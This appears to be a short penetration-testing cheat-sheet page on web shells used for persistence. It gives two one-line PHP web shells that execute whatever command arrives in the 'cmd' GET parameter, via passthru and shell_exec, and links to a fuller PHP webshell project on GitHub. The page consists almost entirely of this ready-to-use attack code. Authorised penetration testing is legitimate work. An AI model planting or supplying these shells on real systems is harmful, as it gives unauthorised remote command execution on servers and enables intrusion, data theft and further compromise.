> For the complete documentation index, see [llms.txt](https://ttp.parzival.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ttp.parzival.sh/pentesting/infrastructure/persistence/web-shell.md).

# Web Shell

### Basic Web Shells

#### PHP

```bash
<?php echo passthru($_GET['cmd']); ?>
```

```bash
<?php echo shell_exec($_GET['cmd']); ?>
```

{% embed url="<https://github.com/WhiteWinterWolf/wwwolf-php-webshell>" %}
